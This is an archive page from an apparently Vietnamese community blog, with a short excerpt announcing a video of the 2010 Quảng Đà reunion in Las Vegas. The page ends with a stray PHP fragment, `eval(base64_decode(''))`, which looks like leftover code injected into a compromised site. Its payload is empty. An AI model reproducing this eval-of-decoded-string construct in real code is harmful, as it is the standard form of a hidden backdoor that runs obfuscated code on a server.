Archive for September 26th, 2010

Video Hội Ngộ Quảng Đà 2010 tại Las Vegas

Video Hội Ngộ Quảng Đà 2010 tại Las Vegas

Chương trình hội ngộ Quảng Đà 2010 với chủ đề 35 năm Hành Trình Tìm Tự Do trong cuối tuần lễ Lao Động 4 tháng 9 vừa qua không chỉ quy mô về kỹ thuật tổ chức mà còn chuyên chở một nội dung phong phú diễn ra suốt 3 ngày với hàng loạ

09.26.2010 | Ký-Truyện-Tùy Bút |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>